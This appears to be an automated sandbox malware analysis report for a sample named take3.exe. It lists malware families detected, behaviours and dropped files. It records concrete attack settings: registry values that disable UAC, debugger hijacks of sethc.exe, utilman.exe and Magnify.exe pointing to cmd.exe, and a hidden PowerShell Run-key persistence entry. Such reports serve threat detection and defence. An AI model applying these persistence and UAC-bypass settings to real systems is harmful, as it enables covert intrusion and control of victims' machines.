Malware Analysis Report

2025-01-23 11:52

Sample ID 241128-yns7batpbn
Target take3.exe.zip
SHA256 5f16ff577993765462d5b054e943ed28bf5dbddb869ca48b22e5643c1a32e6c9
Tags
pyinstaller amadey ammyyadmin asyncrat flawedammyy lumma metasploit njrat quasar xmrig xred xworm default e43a13 office04 sgvp backdoor credential_access defense_evasion discovery dropper evasion execution miner persistence privilege_escalation rat spyware stealer trojan upx vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5f16ff577993765462d5b054e943ed28bf5dbddb869ca48b22e5643c1a32e6c9

Threat Level: Known bad

The file take3.exe.zip was found to be: Known bad.

Malicious Activity Summary

Quasar payload

Metasploit family

xmrig

Amadey family

Quasar family

MetaSploit

Amadey

Asyncrat family

Ammyy Admin

UAC bypass

Detect Xworm Payload

FlawedAmmyy RAT

Xmrig family

AmmyyAdmin payload

Ammyyadmin family

Xworm

Xred family

Xworm family

njRAT/Bladabindi

Njrat family

Flawedammyy family

Xred

Lumma family

AsyncRat

Lumma Stealer, LummaC

Quasar RAT

XMRig Miner payload

Async RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Enumerates VirtualBox registry keys

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Blocklisted process makes network request

Download via BitsAdmin

Sets file to hidden

Event Triggered Execution: Image File Execution Options Injection

Modifies Windows Firewall

Downloads MZ/PE file

Unsecured Credentials: Credentials In Files

Executes dropped EXE

Drops startup file

VMProtect packed file

Checks BIOS information in registry

Loads dropped DLL

Reads user/profile data of web browsers

Identifies Wine through registry keys

Event Triggered Execution: Component Object Model Hijacking

Checks computer location settings

Reads data files stored by FTP clients

Modifies file permissions

.NET Reactor protector

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

UPX packed file

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Access Token Manipulation: Create Process with Token

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Accessibility Features

Command and Scripting Interpreter: JavaScript

Detects Pyinstaller

NSIS installer

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Kills process with taskkill

Views/modifies file attributes

GoLang User-Agent

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Gathers network information

Enumerates system info in registry

Runs net.exe

Uses Task Scheduler COM API

Delays execution with timeout.exe

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Opens file in notepad (likely ransom note)

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-28 19:56

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 19:56

Reported

2024-11-28 19:58

Platform

win7-20240729-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2328 wrote to memory of 2548 | N/A | C:\Users\Admin\AppData\Local\Temp\take3.exe | C:\Users\Admin\AppData\Local\Temp\take3.exe

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23282\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-28 19:56

Reported

2024-11-28 19:58

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A

Xmrig family

xmrig

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates VirtualBox registry keys

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Downloads MZ/PE file

Event Triggered Execution: Image File Execution Options Injection

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | C:\Windows\system32\reg.exe | N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\boot.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\take3.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\UrlHausFiles\langla.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe | C:\Users\Admin\Downloads\UrlHausFiles\22.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\translucently.vbs | C:\Users\Admin\AppData\Local\palladiums\translucently.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe | C:\Users\Admin\Downloads\UrlHausFiles\22.exe | N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\http.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
N/A N/A C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
N/A N/A C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\boot.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wget.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wget.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\test28.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\msf.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe N/A

Identifies Wine through registry keys

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\random.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine | C:\Users\Admin\Downloads\UrlHausFiles\def.exe | N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\Downloads\\UrlHausFiles\\nbea1t8.exe'\"" | C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2916 set thread context of 4928 | N/A | C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe | C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler64.exe | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_fr.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ja.dll | C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe | N/A
File created | C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ar.dll | C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe | N/A
